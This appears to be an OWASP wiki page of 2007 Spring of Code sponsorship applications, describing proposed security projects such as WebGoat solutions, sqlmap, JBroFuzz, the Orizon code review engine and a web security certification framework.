The WebGoat Solutions Guide is a document that can be bundled with WebGoat. Each lesson contains a detailed solution with screenshots and tools. I created a PDF with the solution for WebGoat 4.0 but this is too big to load (15 MB) and is not very practical.

After a discussion with Bruce about this, we think that the solutions should be made like the existing Lessons Plan so it is easier to maintain and update when a lesson changes. This means that there will be documentation folder and an individual solution for each lesson.

* '''Why you should be sponsored for the project''':
I have more then 10 years experience in Java and J2EE and the last 6 years I have tested and broke a lot of web applications. I gave also some very successful J2EE security courses and web security courses. I spoke at different conferences about application security in Europe.
And I am responsible for the security track at Javapolis, one of the biggest Jave conferences in Europe.
I am the co-founder of ZION SECURITY where we do security testing, code review, design reviews, training,...
I'm also member of the OWASP Belgium board that started in March 2007.

== Bunyamin Demir – OWASP WeBekci Project ==

==== Executive Summary: ====

Web application firewalls (WAF) are gaining importance among the information security technologies designed to protect web sites from attack. WAF solutions prevent attacks that network firewalls and intrusion detection systems can't and they require no modification of application source code. ModSecurity [http://www.modsecurity.org/] is an open source web application firewall that runs as an Apache module. It is an embeddable web application firewall and it provides protection from a range of attacks against web applications. It is an open source project available to everyone; it however does not come with an admin panel.

I decided to provide this essential tool with a control panel which I believe will ease and thus encourage its usage.

ModSecurity allows for HTTP traffic monitoring and real-time analysis with no changes to existing infrastructure. My main goal is to analyze attacks and generate rules to change the configuration of the ModSecurity accordingly.

ModSecurity has a feature called “flexible rule engine” as its heart of Attack Prevention capability . It uses ModSecurity’s “Rule Language,” (a programming language designed to work with HTTP transaction data). It is easy to use and flexible; yet the system administrators need to learn its own rules to create what is called “Certified ModSecurity Rules” to be implemented. My control panel will automate the major code-generation in Rule Language.

==== Objectives and Deliverables: ====

* '''Configuration''' : Will add all configuration parameter
* '''Rule Generator''': Will write all the Rules in Rule Language
* '''Logging''' : Auditlog and debuglog will be added.
* '''Multiple-DB''' : Will add PostgreSql and Sqlite support.

==== Why I should be sponsored for the project: ====

I am involved with OWASP Turkey [http://www.owasp.org/index.php/Turkey] and interested very much in WAF. Even though this is my first project for OWASP, I am very much interested in every aspect of ModSecurity. With SpoC007’s support I will finalize my work on OWASP WeBekci [http://www.owasp.org/index.php/Category:OWASP_WeBekci_Project].

== Eric Sheridan and Dr. Goran Trajkovski - The Scholastic Application Security Assessment Project ==

=== ABSTRACT ===

One of the major goals of the Open Web Application Security Project is to educate developers in the field of application software security. Understanding the risks and threats associated with web application software is pivotal in building a mature application security process. While OWASP has made a significant impact in the professional industry, more time and energy should be focused towards the academic community. It is an unfortunate fact that most universities do not require a stringent software security course for their computer science students. Consequently, most young developers do not have the ability to assess and mitigate the risks and threats for their own applications. It is for this reason that we believe the Open Web Application Security Project should fund an initiative to encourage the adaptation of application software security methodologies in the academic course curriculum.

The Scholastic Application Security Project is intended to be the first step towards integrating security requirements in academic course curriculums. The primary goal of the project is to give students hands-on experience performing application security assessments using the tools and documentation found at http:///www.owasp.org. The assessment, lead by an application security professional, will demonstrate to students how the information and tools found at OWASP can be used to assess and ultimately increase the overall security posture of a web application.

This project contributes towards bridging the gap between academia and industry, by equipping students with hands-on ready-for-the-job-market skills in the application software securing industry.

=== PARTICIPANTS ===

The Scholastic Application Security Assessment Project requires that college level students, lead by an application security professional, perform a security audit on an open source web application using the tools and information available at OWASP.

::*'''Application Security Professional''' – Eric Sheridan ([http://www.aspectsecurity.com Aspect Security])
::*'''Towson University (TU) Partner''' – Dr. Goran Trajkovski, Towson University (http://www.towson.edu)
::*'''Students''' – Students of TU’s Application Software Security Course (COSC 458), nominated by the TU Partner
::*'''Web Application''' – The Open WebMail Project (http://openwebmail.org/)

=== OWASP UTILIZATION ===

The Scholastic Application Security Assessment Project requires heavy utilization of existing OWASP tools and utilities. Through this requirement, the project will illustrate the fact that existing OWASP resources can be used and heavily relied upon in a professional security audit. The following is a list of notable OWASP resources whose use will be documented throughout the assessment:

::*'''OWASP Top Ten 2007''' - The security critical areas that the students will assess in the review
::*'''OWASP Testing Guide v2''' – The primary resource for building penetration testing cases
::*'''OWASP Guide''' – The primary resource for technical details pertaining to a technology and/or vulnerability
::*'''OWASP WebScarabNG''' – The primary proxy utility used throughout the assessment

=== THE FINAL REPORT ===

Students are required to follow the principle of “responsible disclosure” during the course of the security assessment. The developers of the open source application will be notified if any significant issues are found. Once the assessment is complete, a final report will be delivered to the application developers and the appropriate OWASP Spring of Code personnel. For each finding in the report, the students will be required to describe how the tools and information found at OWASP were used in the discovery.

=== HOW DOES OWASP BENEFIT? ===

The Scholastic Application Security Assessment Project is specifically designed to benefit the OWASP brand:

''The OWASP Community…''
::*will be provided a case study proving that the resources available at OWASP can be utilized in an academic environment, that can be later used in advertising the OWASP efforts to similar programs as the one at TU.
::*will be providing students a hands on experience in learning and testing for the latest web application security threats, thus potentially enlarging the OWASP community of contributors and supporters.
::*will be addressing the need to educate developers in the security critical areas.
::*will be seen as offering a professional level service to another open source project.
::*will be addressing one of the root causes of application software insecurity.

=== BACKGROUND ===

'''Eric Sheridan:'''

::*Earned a Bachelor’s of Science in Computer Science from Towson University
::*Graduate Student in Information Security at Johns Hopkins University
::*Application Security Engineer at Aspect Security
::*Lead of the OWASP Stinger Project and the OWASP Validation Project

'''Goran Trajkovski, PhD:'''

::*Has been teaching the Application Software Security course for the Computer Security undergraduate and master-level majors at TU since 2004 (TU has been a Center of Excellence in Information Assurance, designated by the NSA since 2002).
::*Assistant professor of Computer and Information Sciences at Towson University, and Director of its Cognitive Agency and Robotics Lab (CARoL).
::*Has lead curricular efforts in integrating application software security topics throughout the Computer Science and Computer Information Sciences curriculum
::*12 years of full time teaching experience in higher ed.

==Boris - OWASP Site Generator==
OWASP Site Generator is a great tool, but it could be even better and more widespread. There’s a lot room for improvements to both its functionality and user experience. The way I see it, main user needs to be addressed and specific development objectives for the next release of OWASP Site Generator would be:
===User Needs===
*Create multiple types of sites easily
*Track and analyze requests easily
*Change the look and feel of the resulting sites easily
*Create sites for multiple web backend technologies easily
*Learn how to use OWASP Site Generator easily

===Development Objectives===
*Create a vulnerability library that can be used for web services, HTML forms, AJAX, etc. instead of having to craft the same attack for each
*Add support for logging of all received requests, as well as querying resulting log files
*"Templatize" the code generation process, so it can support skinning of the resulting sites
*"Templatize" the code generation process, so it can support different backend web technologies
*Fix all significant defects in the current release of OWASP Site Generator
*Redesign the GUI to make it more efficient and user friendly
*Create a smooth setup program which would install both client and server components as effortlessly as possible
*Write documentation and articles about it
*Make the development process open to the public and, hopefully, driven by its feedback from day one

===Why should I be sponsored for this project===
Well, probably because of my past work on AoC (I just hope that won’t be the reason for me ''not'' to be sponsored :)

==Boris - OWASP Report Generator==
There is no doubt that OWASP Report Generator is a very handy tool for penetration testers and other security researchers, but it would be even better if some enhancements were made:
===User Needs===
*More robustness
*Ease of use (more efficient and intuitive GUI)
*Automated reporting for some typical (or not so typical) scenarios
*More documentation
*More samples

===Development Objectives===
*Redesign the GUI to make it more efficient and user friendly
*Clean up the code
*Add functionality to import, execute and create reports for OWASP Tiger automated tests
*Create some samples
*Create a smooth setup program
*Write documentation and articles about it
*Make the development process open to the public and, hopefully, driven by its feedback from day one
===Why should I be sponsored for this project===
Well, probably because of my past work on AoC (I just hope that won’t be the reason for me ''not'' to be sponsored :)

==Boris - OWASP Tiger==
OWASP Tiger project is at its very beginning. Some new features are needed in order for it to become more useful. Here’s a short list:
===User Needs===
*Easier editing of test projects
*Support for testing sites that require authentication
*Support for testing sites that require use of cookies
*An easy way of specifying vulnerability data, ideally an automated one
*More flexible reporting
*More project templates
*More documentation
===Development Objectives===
*Add support for cookies
*Add support for standard authentication schemes
*Add support for importing vulnerability data from a test definition (or a vulnerability library)
*Make use of OWASP Report Generator for more advanced reports
*Create a setup program that would install both client and project templates and also allow for adding new templates after the initial installation
*Write documentation and articles about it
*Make the development process open to the public and, hopefully, driven by its feedback from day one
===Why should I be sponsored for this project===
Well, probably because of my past work on AoC (I just hope that won’t be the reason for me ''not'' to be sponsored :)

==Heiko - Web Application Security put into practice==
I'm trying to make the OWASP Top Ten and Guide project known in the programming community, but I understand that clear examples in the specific programming language and best practices with explanation educate the best. I'm at the chair for secure software at my university and I want to contribute practical examples, because I believe not to teach secure programming is a great oversight in today's education. Not only the programmers in large companies have to be aware of security impacts, but also their future employees and their freelance programmers. I'm with a large organization of freelance programmers, which I want to make aware of security flaws.

The Ruby on Rails Security project [http://www.rorsecurity.info/] started this year and is the only security initiative for Ruby on Rails. Ruby is the fastest growing level A programming language, according to the Tiobe programming community index [http://www.tiobe.com/tpci.htm], partly because of its advertised simplicity. This is dangerous, as programmers could be enticed to do cargo cult programming [http://en.wikipedia.org/wiki/Cargo_cult_programming] without knowing the security impacts. I found several security holes in popular modules, and even the Rails framework itself generates potentially insecure code. Nevertheless, Rails provides good means against many of the OWASP Top Ten security flaws, but I believe these means have to be popularized much more.

===Objectives and Deliverables===
* Create a security guide to the most popular web server software, Apache
** Installation
** secure configuration, emphasis on Rails, but not limited to it
** file system privileges for Rails and Apache
** anti profiling techniques for Apache
** Modules and Mod_security configuration

* Create a security guide to the popular database software, MySQL, as practical contribution to the OWASP Top 10 Insecure storage section
** Installation
** secure configuration, emphasis on Rails, but not limited to it
** file system privileges for Rails and MySQL
** MySQL access restriction techniques
** encryption methods

* Ruby on Rails security guide and code examples, with at least the following topics:
** Anti profiling techniques
** Rails routes security
** error handling and presentation, as in OWASP Top 10 Improper Error Handling
** OWASP Top 10: XSS in Rails
** OWASP Top 10: SQL injection in Rails
** OWASP Top 10: Parameter injection in Rails
** OWASP Top 10: Session handling in Rails
** OWASP Top 10: Access control in Rails
** handling of files
** integrity
** encryption and SSL
** logging flaws
** Ajax security

* Code & other
** means to check the security of MySQL
** input validation guide, and implement it in Ruby
** update the poorly documented guide at http://manuals.rubyonrails.com/read/chapter/40 which is the only official guide to security
** usage guide for OWASP tools, also in connection with Rails
** make the results known in the several communities I'm in
** if applicable: submit code to Rails for security holes found

===Why I should be sponsored for the project===
I have been programming professionally for 10 years and created several software products, including Internet applications, and I always focused on security. I am currently graduating university, my thesis is about web application security. Recently, I started the Ruby on Rails security project, which is the only security project for Rails. I have always delivered my work on time, and I believe I have the knowledge to deliver good quality.

===Long-term vision for the project===
Make it available to the community and accept security notices and best practices from other users to constantly improve it.

===Benefits to the OWASP===
* practical guides on how to put security into practice: the most popular web server software Apache and the popular database software MySQL
* if applicable: additional examples and chapters for the OWASP Guide
* the first and only fully-fledged security guide to a programming language and framework which is used by many large companies
* security awareness of future employees and freelancers
* more exposure of the OWASP

==Denis – Python Tainted Mode==
I am graduate student of Moscow State University, department of Computational Mathematics and Cybernetics.
My graduate work is dedicated to web-application security. The goal of my graduate work is to combine dynamic code analysis with penetration testing to provide more precise analysis.
This work will help to find security vulnerabilities in web-applications.
I successfully presented parts of my work at university conferences.

===My Project===
The goal of my project is to create analog of Perl’s Taint Mode for Python programming language.
Taint mode is successfully used in Perl, PHP, and Ruby to find input validation vulnerabilities in web-applications (see for ex. PHPRevent[http://dependability.cs.virginia.edu/info/PHPrevent]).
Unfortunately there is no implementation of Taint Mode for Python language despite of wide spread of Python-based web-applications. Taint Mode for Python is highly claimed.
I plan to modify Python interpreter and add Taint label propagation. Then I’ll add three configuration lists:
* List of sources. All data emanating from sources must be marked tainted.
* List of critical functions, that shouldn’t receive tainted data.
* List of sanitizing functions that untaints data.
These three lists are dependent on technology that is used between web-server and web-applications in web server. In my project I plan to build such lists for mod_python and then broaden for other technologies. With switched on taint mode web-application will receive exceptions when critical function receives tainted data.

===Why should I be selected===
I have strong mathematical & computer science background. I’m familiar with research publications on dynamic analysis and with implementation of taint mode in Perl and PHP (PHPrevent Project).
This project is part of my work at university. It will be made under mentoring of my scientific advisor.
This work is already practically done that’s why I’m sure I will finish my project in time.
I have strong skills in developing projects with Python, Java, C, C++, and Assembler. Then I plan to support, develop and enhance my project and increase its quality with penetration testing.

If you have any questions or would like further information, feel free to contact me.

Yours faithfully,
Denis

== Darren Edmonds - WebScarab NG Security Test Automation ==

=== Background ===
I am a 28 year old software developer from the UK with a background in java based web development and application security testing. I have strong mathematical skills, a degree in software engineering, a SCJP qualification and 8 years of commercial development experience. I have created many web based and standalone applications delivering on time and adhering to common software practices.
I'm an avid supporter of open source software and try to use it whenever possible in a commercial environment. I've made contributions to the Geotools mapping project, written a securing tomcat article for OWASP and developed a full modification for the first person shooter Quake 3.

=== Project Details ===
Having used numerous penetration testing applications I believe there is a need for an open source application which supports some, or all, of the features of the more expensive commercial products. I propose to make WebScarab generate, record, and playback security test cases so that regression testing is possible. If time permits I would also like to include some extra automated tests that are not always feasible during manual testing; searching for backup files (~, Copy of X), checking non-authorised access to authorised areas, common and brute force name directory searching, etc. Perhaps include the ability to read the test database of other scanning tools such as nikto.
I have already made contact with Rogan Dawes, original WebScarab NG author, to discuss some initial ideas. I believe it is important that Rogan is consulted during the initial planning phase to make sure the project keeps to a set of consistent guidelines.

=== Milestones ===
* Research regression testing features in other applications
* Create a functional specification
* Build testing framework (possible inclusion of scripting language for user defined tests)
* Testing

=== Why I Should be Sponsored ===
I believe I am an ideal candidate to develop the proposed additions to WebScarab NG, not just because of my qualifications and experience, but because I plan to use WebScarab NG in my work to help perform the initial testing of web applications. As well as my own time my current employer will allocate me a set amount of time to ensure the project achieves its milestones.
The end result will make WebScarab NG a much more powerful testing tool and will be a great asset to the OWASP community. With continued development and input from the community I see no reason why WebScarab NG cannot rival commercial testing application features, usability, and business benefit. Increasing WebScarab's features will result in increased community awareness bringing in extra developers, ensuring continual development and so the cycle starts again.

== Bernardo - sqlmap ==

* '''Executive Summary'''
[http://sqlmap.sourceforge.net sqlmap] is an automatic blind SQL injection tool, developed in python, capable to perform an active database fingerprint, to enumerate entire remote database and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

* '''Objectives and Deliverables'''
** Add support for Oracle database management system;
** Add support to extract database users password hash;
** Extend inband SQL injection functionality to all other possible queries;
** Add Microsoft SQL Server database fingerprint;
** Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting;
** Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers;
** Add support for query ETA (Estimated Time of Arrival) real time calculation;
** Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions;
** Improve logging functionality.

* '''Long-term vision for the project'''
Make sqlmap available as an easy-to-use enumeration and penetration testing tool to the OWASP community extending its functionality to exploit SQL injection vulnerabilities to provide a remote shell on the affected web application database server when possible.
In the long run I would also like to develop a graphical user interface.

* '''Why I should be sponsored for the project'''
I have good python programming skills and some years of experience in computer networks security. I spent most of the last year researching on web application insecurity taking over the [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap development] since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

OWASP Spring Of Code 2007 Applications

2007-03-30T13:01:21Z

Inquis:

This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]

'''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''

See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what do to one you completed your Application

---------

'''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:

== {Your first name or Alias} - {Project name} ==
Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].

You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic. We strongly suggest that you include the following information in your proposal.

* Your educational and professional background

* Application security experience and accomplishments

* Participation and leadership in open communities

* The opportunity, challenges, issues or need your proposal addresses

* Objectives or ways in which you will meet the goal(s)

* Specific activities and who will carry out these activities

* Specific deliverables and a rough project schedule so we can track progress

* Long-term vision for the project

* Any other reasons why you and your project should be selected

== Buanzo - Enigform: Firefox Addon for OpenPGP signing of HTTP requests ==

I am a 25 year old Independent security consultant from Buenos Aires, Argentina, that has contributed to the world of
information systems security since 1994, when BBSes and Linux still lived together.

A quick search for buanzo on google [http://www.google.com/search?hl=en&q=buanzo&btnG=Google+Search] will provide all necessary details about my professional and community background. For comprobable experience, you could also check my Rent a Coder profile.[http://www.rentacoder.com/RentACoder/SoftwareCoders/showBioInfo.asp?lngAuthorId=735204].

In my free time I like playing with my Punk-Pop band [http://www.purevolume.com/futurabandapunkpop], Futurabanda. [http://www.futurabanda.com.ar], and maintaining my Restaurants, Wines and Recipes site. [http://www.vivamoslavida.com.ar]. I have to admit that my first priorities are my beloved son [http://www.fotolog.com/buanzo] and my wonderful wife [http://www.fotolog.com/buanzo].

=== Accomplishments ===

I've contributed scripts, fixes and translations to the Nmap project. I've also acted as Expert Contributor for SANS TOP-20 2004, 2005 and 2006. I've developed
tools that can be found in Freshmeat, like mprl (a getty enhancement to allow remote logins from the login: prompt of the console). I've also written
the Unix chapter of the OISSG's Information Systems Security Assessment Framework, v0.1 [http://www.oissg.org/content/view/71/71/]. I'm currently writing
an Internet Draft to be proposed for RFC regarding Enigform.

=== Community ===

I run the official 2600 meetings site for Argentina [http://www.2600.com/meetings/pages.html], I've been proposed, but I refused, for President of the Argentinian Free Software group called SOLAR [www.solar.org.ar]. I'm an active member of the FLOSS community since 1996, having written articles in magazines http://www.net-security.org/dl/articles/Detecting_and_Understanding_rootkits.txt, made TV, radio
and newspaper appearances [http://codigoabierto.bitacoras.com/archivos/2005/04/01/buanzo-hacks] and led different security research groups of Spain, Mexico and Argentina. Currently I contribute time thorugh my sites, forums and blogs,
answering questions in mailing lists and helping coordinate some local LUGs. I do also manager the Linux Counter for Argentina [http://counter.li.org/reports/place.php?place=AR].

=== My Project ===

Enigform [http://enigform.mozdev.org] is a Firefox extension that enhances HTTP with OpenPGP functionality. It digitally signs outgoing HTTP requests so that a web server can authenticate the identity and data of the incoming request. It is a Web Security tool because it can, if correctly implemented as any OpenPGP based technology, render man in the middle attacks useless. I think OpenPGP already speaks for itself regarding eMail. Imagine the same benefits for http and web applications. I think Enigform can fit into the OWASP Validation Project [http://www.owasp.org/index.php/Category:OWASP_Validation_Project].

Enigform is the reference implementation of the Internet Draft I'm working on, in discussion with members of the IETF's OpenPGP Working Group.

Some simple PHP code is enough to make a web application Enigform-aware [http://enigformtest.buanzo.com.ar]. The Smutty PHP MVC Framework already supports Enigform [http://smutty.pu-gh.com/demo/enigform].

=== Long Term ===

Have the Draft be proposed as a Standards Track RFC document, have Enigform support directly in Apache and IIS, and port Enigform to other browsers
and/or programming languages, and also provide OpenPGP De/Encryption support.

=== Why should I be selected ===

I have the experience, security awareness and means to make this project THE web security project of the decade. I am a respected member of the
international security community, and I firmly believe Enigform is my greatest idea so far.

== Eoin Keary - Code review Project ==
* '''Executive Summary''':
I am proposing that I complete the OWASP Code review guide during this period.
The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners.

I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.

There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.
Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as Webservices.

The Code review process and procedure needs also to be covered. A guide to establishing a mature code review process also needs to be done.
Code review methodologies also need to be discussed.

* '''Objectives and Deliverables''':

Update of the code review guide:
* Add additional areas relating to the code review process such as:
** Benefits and pitfalls
** Methodology
** The code review process
*** Transactional analysis
*** Managing the code review process
*** Assigning risk to findings

** Technical guides
*** Language specific best practice
*** Java
*** .NET
*** PHP
*** MySQL
*** Stored Procs
*** C/C++

** Code review by vulnerability:
*** Reviewing Code for Buffer Overruns and Overflows
*** Reviewing Code for OS Injection
*** Reviewing Code for SQL Injection
*** Reviewing Code for Data Validation
*** Reviewing code for XSS issues
*** Reviewing Code for Error Handling
*** Reviewing Code for Logging Issues
*** Reviewing The Secure Code Environment
*** Reviewing code for Authorization Issues
*** Reviewing code for Authentication Issues
*** Reviewing code for Session Integrity
*** Reviewing code for Cross Site Request Forgery
*** Reviewing code for Cryptography implementation issues
*** Reviewing code Dangerous HTTP Methods (Deployment)
*** Race Conditions

The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.

* '''Why I should be sponsored for the project''':

I used to head up the code review team as part of the application security group in fidelity investments and have 5+ years of the secure code review process.
I also was the lead of the Testing guide until V2 was published via the Autumn of Code.

I have always delivered any work I have volunteered for on time.

I have been involved in OWASP projects for 2/3 years now and have always been an active contributor.

== Paolo Perego - Owasp Orizon Project ==
* '''Executive Summary''':
Owasp Orizon [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] Project born in 2006 as answer to the lack of common engine and library usable by opensource code review related tools.

I'm proposing that, during the Spring of Code 2007 period, I'll complete static analisys API and java source code enforment objects.

Sometimes a complete code review approach is not suitable for most customers who wants to harden their code which is being approaching release stage. For such a reason, I started writing Java objects that embeds most of the security checks against common web vulnerabilities (XSS, SQL injection, Session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.

I do believe that a common set of API and a common safe coding best practices library is one of the most important goals to bring application security to the developers.

* '''Objectives and Deliverables''':
Completing the static code review API section
* improving programming language to XML translator
* improving security best practices code review scan library
* improving secure coding fashion best practices library
* writing the pattern matching scan using the aformentioned libraries
Writing the java source code enforment objects
* writing an object to handle form data values to avoid XSS
* writing an object to handle form data values to avoid SQL Injection
* writing an object to handle HttpRequest and HttpSession objects

* '''Why I should be sponsored for the project''':
Owasp Orizon is the first Owasp project I'm involved in. I'm also contributor of Owasp Italian chapter managed by Matteo Meucci and I'm talking at various speeches about application security and safe coding best practices.

I'm a security consultant working in ethical hacking and we're approaching code review and safe topics right now.
I'm a developer too so I understand also the "dark side" of the problem developing code with security in mind.

I work using the "release early release often" paradigm so to be concrete and let other people having something usable to work with.

== Sebastien Deleersnyder - OWASP Education Project ==
* '''Executive Summary''':
This Education project aims to provide in building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences.

Web Application Security Education and Awareness is needed throughout the entire organization, each area and level of organizations have specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience.

* '''Objectives and Deliverables''':
Currently the project goals are to create Educational Tracks:
* Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past
* A "Web Application Security Primer" Track for beginners (4 hours)
* A "What developers should know on Web Application Security" Track for developers (4 hours)

* '''Why you should be sponsored for the project''':
I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.

This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my believe that awareness is an important cornerstone of building secure web applications, and this project will actively support that.

If we are granted Spoc 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.

* '''More details''':
The detailed [[OWASP Education Project Roadmap|road map]] can be found here.
The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.

== Subere - OWASP JBroFuzz Project ==

==== Overview ====

JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.

==== Fuzzing ====

As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.

==== Objectives ====

JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addtion of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):

* '''Open Source Tab'''
* '''NTLM Brute Force over HTTP/S Tab'''
* '''Pure HTTP/S Fuzzing using HTTPClient'''
* '''Blind SQL Injection Fuzzing Tab'''

At the same time, the following existing tabs need to be updated and made more robust (details in next section):

* '''TCP Fuzzing tab allowing graph outputs'''
* '''TCP Sniffing tab update thread Agent Queue'''
* '''Update Generators file format'''
* '''Include SOAP and XML fuzzing'''

This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.

==== Deliverables ====

Based on the above, the new code elements that will be added are as follows:

* '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''
* '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute over HTTP/S NTLM.''
* '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''
* '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''

For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail:

* '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''
* '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''
* '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''
* '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''

Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.

==== Background ====

In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of appr. 5000 downloads in the last months.

Coming from a strong java background (5+ years) I decided to implement and release JBroFuzz in order to initially simplify penetrations testing processes that relate to web application and network protocol fuzzing.

I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.

==== Why should JBroFuzz be sponsored? ====

Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area of focus that should not be dismissed in building secure software applications.

Keep the code platform independent adds a huge advantage.

Receving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality that they have assisted in implementing.

== Joshua Perrymon - OWASP LiveCD Project ==
* '''Executive Summary''':
I am proposing that I complete the second version of the OWASP LiveCD during this period.
The first version of the LiveCD is now available and include many of the current OWASP documents and tools. I believe the LiveCD is one of the best mediums to promote OWASP tools and documentation. It is portable and already being used by thousands of security proffesionals to perform application testing and training.

In the current state the CD is stable and contains a lot of tools. However, this is just the beginning. There is a LOT of work that needs to be completed. The entire CD experience needs to be branded using OWASP graphics. This shouls start with the boot screen and carry all the way through to the icons and desktop graphics. The CD should also inlcude the wiki and ALL the tools developed for OWASP.

* '''Objectives and Deliverables''':

Update of the LiveCD:
* Complete OWASP branding
* Add OWASP wiki
* Add encryption capabilities
* Add more OWASP tools
* Add more pen-test tools such as;
VOIP, RFID, BlueTooth, Wireless, etc..

* '''Why I should be sponsored for the project''':

I had the idea of the LiveCD about a year ago and have worked very hard to get the first version developed. This was driven by my vision to make all of the OWASP tools available on a portable medium. The main difference in the OWASP liveCD vs. other live CDs is going to be the regularity of updates. If sponsorship can be obtained the CD could be updated on a monthly basis. Not once a year like other liveCDs. The CD will also include specialty tools and documentation to perform VOIP, RFID,Bluetooth, and wireless security assessments.

----

== Mark Curphey – The OWASP Web Security Certification Framework ==

'''Problem'''

PCI DSS is attracting a lot of criticism for a lot of valid reasons.

http://securitybuddha.com/2007/03/23/the-problems-with-the-pci-data-security-standard-part-1/

http://blogs.csoonline.com/node/210

http://www.computerweekly.com/blogs/stuart_king/2007/03/more-on-pci---the-audit-guide.html

The list is of course long and not appropriate here……and while its easy to knock PCI, there is nothing better out there.

'''Solution and Deliverables'''

As opposed to me continuing saying what’s wrong with PCI DSS, it seems to me that OWASP is a perfect forum to simply create and publish a “better criteria”. This can either be adopted and implemented by an organization like OWASP or considered to be incorporated into the PCI or other security standards. We won't get bogged down in the politics up-front, but hold something good up to the world for people to adopt. This project would of course draw on and bring together many of the other OWASP Projects including the Guide (What is a secure web app), Testing Guides (How to test for a secure web app), WebGoat (part of how to certify an individual understands and can find web app issues) etc. Many of those projects may not be complete or a perfect fit today, but this project can bring a common connecting theme to a lot of very valuable IP that OWASP has built over the years. I will also create it in such as way that a corporate could adopt/adapt it themseles as well as an industry. Where other OWASP projects are not complete or currently suitable I will build a requirements doc that can be considered by those teams if they feel appropriate.

This project would address the;

'''Standard'''
*A complete auditable (important) web site security standard suitable for modern e-commerce companies including
**The technical things people should care about
**The operational / management things people should care about
'''Certification Model'''
*A complete framework for certification (ongoing) and implementation (including certifying auditors, ongoing validation etc). This will include for example the model for certifying auditors (including the actual test program); checklists and forms for auditors to complete and other supporting material.

Essentially its a complete blueprint for an organisation like OWASP or a regulatory body need to run a web site security certification program complete with the supporting material to implement it.

Note: This is no trivial task to get right. I would need to ensure I can commit to completing the work to a good quality. I think this will take at least 2 months from start to finish to complete but I think is very important for the industry and for potentially for OWASP. I wanted to gauge the interest by first posting this.

== Erwin Geirnaert - OWASP Java Project ==

* '''Executive Summary''':
I would like to help the OWASP Java Project to gather all Java security related information and to document any domains that lack documentation.

* '''Objectives and Deliverables''':
The main objective I see is to gather all information in one place, where security experts and developers can find the information they need.
In order to get there, I need to collect all information in the OWASP Wiki, ask people if they want to donate it to OWASP so that we can include it as public material, add URLs, white-papers, references to books, ... And if time permits, write some documentation myself.

One deliverable is the OWASP Top 10 for J2EE applications with clear examples of vulnerabilities and mitigations.

* '''Why you should be sponsored for the project''':
